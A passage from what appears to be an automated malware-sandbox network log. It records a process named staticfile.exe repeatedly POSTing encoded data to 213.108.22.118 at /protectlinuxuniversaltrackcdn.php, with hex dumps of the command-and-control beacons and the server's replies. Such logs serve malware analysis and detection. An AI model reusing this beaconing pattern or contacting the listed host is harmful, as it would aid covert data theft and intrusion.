                                        Data Ascii: UZYUU^UXU\WYPRZPX\[YQPSXU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"<54X%-+/Z?2<S'8>%#Z7V'=2"Z.$._/%^/
                                        Nov 30, 2024 22:37:06.050535917 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:06.287166119 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:37:05 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        55192.168.2.449881213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:06.637101889 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:37:06.981955051 CET2544OUTData Raw: 55 58 5c 58 55 58 55 5b 55 5c 57 59 50 5d 5a 5d 58 5f 5b 5d 51 50 53 59 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UX\XUXU[U\WYP]Z]X_[]QPSYU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!?.&!28& \,?#W%<S$-?)5?\ =3=$#-.$._/%^/8
                                        Nov 30, 2024 22:37:11.079631090 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:11.339910984 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:37:10 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        56192.168.2.449892213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:11.587812901 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:37:11.935154915 CET2544OUTData Raw: 55 50 5c 59 50 5f 50 5a 55 5c 57 59 50 59 5a 56 58 59 5b 5b 51 5a 53 5b 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UP\YP_PZU\WYPYZVXY[[QZS[U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!(X*X#"8X$-([;0%<3;^(&?[#?U'[$1"9._/%^/(


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        57192.168.2.449897213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:12.607671976 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1428
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:37:12.966634989 CET1428OUTData Raw: 50 5b 5c 5f 55 5e 55 5c 55 5c 57 59 50 5a 5a 54 58 5c 5b 5b 51 50 53 54 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P[\_U^U\U\WYPZZTX\[[QPSTU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!D+.&!"($.8],<7T28(W%-8># /1W$.+^%U:9._/%^/$
                                        Nov 30, 2024 22:37:13.965239048 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:14.211078882 CET380INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:37:13 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 20 04 3c 3b 25 04 29 3b 3d 5d 2e 01 2c 1c 31 3b 3e 07 38 2d 2d 15 3f 14 31 59 29 12 00 0c 23 28 09 5c 3f 07 36 1e 33 08 03 03 28 11 2b 5e 0c 1b 20 45 3c 2b 03 5f 27 28 33 04 30 33 2c 5a 35 31 0a 00 24 2d 26 55 28 16 25 00 34 0f 31 0c 2f 22 36 0f 25 29 2f 07 3e 2c 34 0e 21 29 2f 56 0b 12 22 1a 27 32 25 5a 25 3f 0a 5c 20 23 3e 58 36 35 36 10 37 11 04 0d 35 38 22 1f 3f 07 32 58 21 33 0e 53 3e 5b 25 10 31 22 27 17 2a 07 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: <;%);=].,1;>8--?1Y)#(\?63(+^ E<+_'(303,Z51$-&U(%41/"6%)/>,4!)/V"'2%Z%?\ #>X656758"?2X!3S>[%1"'*/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        58192.168.2.449898213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:12.741487026 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:37:13.091394901 CET2544OUTData Raw: 55 5b 59 5f 50 58 55 5a 55 5c 57 59 50 5c 5a 51 58 5e 5b 5b 51 5c 53 5b 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U[Y_PXUZU\WYP\ZQX^[[Q\S[U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"<"#8_1 Z/,?V%('?_>( <.$-?]&06^:._/%^/
                                        Nov 30, 2024 22:37:14.263777018 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:14.520664930 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:37:13 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        59192.168.2.449904213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:14.783297062 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Nov 30, 2024 22:37:15.139744997 CET2544OUTData Raw: 50 5d 5c 5e 50 5a 50 59 55 5c 57 59 50 5a 5a 50 58 5e 5b 58 51 5e 53 5a 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P]\^PZPYU\WYPZZPX^[XQ^SZU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!<14"%;Z#U&(R' *6/"/1S$$% 6,4._/%^/$
                                        Nov 30, 2024 22:37:16.258435011 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:16.502788067 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:37:15 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        60192.168.2.449909213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:16.747864962 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:37:17.107008934 CET2544OUTData Raw: 55 51 59 55 55 5d 55 58 55 5c 57 59 50 5a 5a 50 58 5f 5b 53 51 5f 53 5b 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UQYUU]UXU\WYPZZPX_[SQ_S[U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"(. "2='-<1'-^(%#Y=S&-?%#:._/%^/$
                                        Nov 30, 2024 22:37:18.110650063 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:18.360730886 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:37:17 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        61192.168.2.449914213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:18.815316916 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2536
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:37:19.169656992 CET2536OUTData Raw: 50 5c 59 5b 55 5e 55 5d 55 5c 57 59 50 5b 5a 56 58 5a 5b 59 51 5a 53 5f 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: P\Y[U^U]U\WYP[ZVXZ[YQZS_U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!D+2#!(%X$8<(&]70-?[=%< ,2&-&0>Z-._/%^/(


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        62192.168.2.449917213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:19.337589979 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1428
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:37:19.685547113 CET1428OUTData Raw: 50 5a 59 5c 50 5a 55 5f 55 5c 57 59 50 53 5a 52 58 5d 5b 5b 51 5a 53 58 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: PZY\PZU_U\WYPSZRX][[QZSXU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"+>. 0\2>8;W23==6;X 1R0>?Z&U5-._/%^/
                                        Nov 30, 2024 22:37:20.889277935 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:21.144403934 CET380INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:37:20 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 20 07 2b 01 2e 13 2b 2b 21 5b 3a 01 0d 0f 26 2b 2e 07 2d 2d 39 59 28 04 13 12 3e 3c 25 1d 35 01 3b 58 2b 07 25 0f 24 36 29 00 2a 2b 2b 5e 0c 1b 20 41 3f 2b 00 04 24 5d 28 5f 27 0e 09 06 20 21 3f 11 33 2d 2e 56 3c 16 07 05 37 22 39 0c 2d 32 29 1f 31 07 38 5a 3d 01 3c 0f 21 13 2f 56 0b 12 21 0a 24 32 35 12 31 3f 33 02 20 30 3e 14 35 18 3d 02 37 06 3e 0e 23 3b 2e 5b 3f 3e 07 06 20 1d 20 57 3e 04 39 58 32 0c 2f 1a 2a 3d 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: +.++![:&+.--9Y(><%5;X+%$6)*++^ A?+$](_' !?3-.V<7"9-2)18Z=<!/V!$251?3 0>5=7>#;.[?> W>9X2/*=/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        63192.168.2.449918213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:19.462233067 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:37:19.811302900 CET2544OUTData Raw: 55 58 5c 5e 55 58 55 5c 55 5c 57 59 50 53 5a 55 58 55 5b 5c 51 5f 53 58 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UX\^UXU\U\WYPSZUXU[\Q_SXU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X"+% "$=$/??W2+0=)C ?$$1 6_-._/%^/
                                        Nov 30, 2024 22:37:20.841526985 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:21.931884050 CET207INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:37:20 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        64192.168.2.449925213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:22.178318024 CET303OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2536
                                        Expect: 100-continue
                                        Nov 30, 2024 22:37:22.531904936 CET2536OUTData Raw: 55 5c 5c 59 55 5b 55 5b 55 5c 57 59 50 5b 5a 53 58 55 5b 52 51 51 53 5d 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U\\YU[U[U\WYP[ZSXU[RQQS]U[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!D<&#20^1.(/Z?U$(#'-=6/7/W'-/$#&[.._/%^/
                                        Nov 30, 2024 22:37:23.535909891 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:23.779062986 CET151INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:37:23 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 31 59 5a 51
                                        Data Ascii: 1YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        65192.168.2.449930213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:24.022928953 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:37:24.379195929 CET2544OUTData Raw: 55 59 59 5d 50 5d 50 51 55 5c 57 59 50 52 5a 50 58 5d 5b 58 51 5f 53 58 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: UYY]P]PQU\WYPRZPX][XQ_SXU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!?.)!2#&X8,Z3R%++$[7_)C#X#$>'_1):._/%^/
                                        Nov 30, 2024 22:37:25.569430113 CET232INHTTP/1.1 100 Continue
                                        Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 61 74 2c 20 33 30 20 4e 6f 76 20 32 30 32 34 20 32 31 3a 33 37 3a 32 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a 31 59 5a 51
                                        Data Ascii: HTTP/1.1 200 OKDate: Sat, 30 Nov 2024 21:37:25 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 4Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=UTF-81YZQ


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        66192.168.2.449936213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:25.819578886 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        67192.168.2.449937213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:26.275552034 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 1428
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 30, 2024 22:37:26.623179913 CET1428OUTData Raw: 55 5c 5c 5a 55 5d 55 5f 55 5c 57 59 50 5e 5a 50 58 5b 5b 5e 51 5e 53 5a 55 5b 43 5d 51 59 5b 52 5f 59 51 51 53 5c 54 5f 5f 53 51 59 56 5d 54 5b 5f 53 5a 47 42 5a 52 5e 5a 5a 57 5a 59 51 53 58 5c 50 5d 5d 5a 5c 58 57 47 5d 5c 59 5e 50 58 58 51 53
                                        Data Ascii: U\\ZU]U_U\WYP^ZPX[[^Q^SZU[C]QY[R_YQQS\T__SQYV]T[_SZGBZR^ZZWZYQSX\P]]Z\XWG]\Y^PXXQS_W^\ZZR]U_Z^UVXX]PZ__[X\_Y]SXY_JQ\]\ZSZY]\P[]Y]WZRT^[^X^UXWZUWUZ^]YP[F[[Z^V]R[Z^_JZT[\P[Z^XXXU^]_[XY[X!E+%#!;%-#,R%W'8>8 &'1 9-$._/%^/4
                                        Nov 30, 2024 22:37:27.744520903 CET25INHTTP/1.1 100 Continue
                                        Nov 30, 2024 22:37:28.879277945 CET380INHTTP/1.1 200 OK
                                        Date: Sat, 30 Nov 2024 21:37:27 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Vary: Accept-Encoding
                                        Content-Length: 152
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 03 11 23 14 2b 06 04 13 3c 3b 2d 11 2d 01 3c 1d 32 5e 25 5e 2f 5b 31 5f 29 29 35 5e 2a 2c 25 57 22 28 37 5b 3c 5f 21 0c 24 26 29 01 28 01 2b 5e 0c 1b 23 1c 3e 2b 0f 5c 33 05 2b 07 33 33 28 5f 35 0f 3f 59 24 03 00 53 28 06 0c 5d 37 21 2a 51 2c 0b 36 0c 32 2a 24 5b 29 3f 01 11 22 13 2f 56 0b 12 21 0a 33 0b 39 5b 31 06 38 5d 37 0e 07 01 23 35 31 04 34 3c 21 55 36 2b 32 5b 28 3e 00 5f 34 0d 38 50 3e 03 04 02 32 0c 20 09 3d 3d 2f 50 2f 05 22 56 0c 31 5d 4d
                                        Data Ascii: #+<;--<2^%^/[1_))5^*,%W"(7[<_!$&)(+^#>+\3+33(_5?Y$S(]7!*Q,62*$[)?"/V!39[18]7#514<!U6+2[(>_48P>2 ==/P/"V1]M


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        68192.168.2.449938213.108.22.118807740C:\Users\user\AppData\Local\staticfile.exe
                                        TimestampBytes transferredDirectionData
                                        Nov 30, 2024 22:37:26.396536112 CET327OUTPOST /protectlinuxuniversaltrackcdn.php HTTP/1.1
                                        Content-Type: application/octet-stream
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                        Host: 213.108.22.118
                                        Content-Length: 2544
                                        Expect: 100-continue
                                        Connection: Keep-Alive
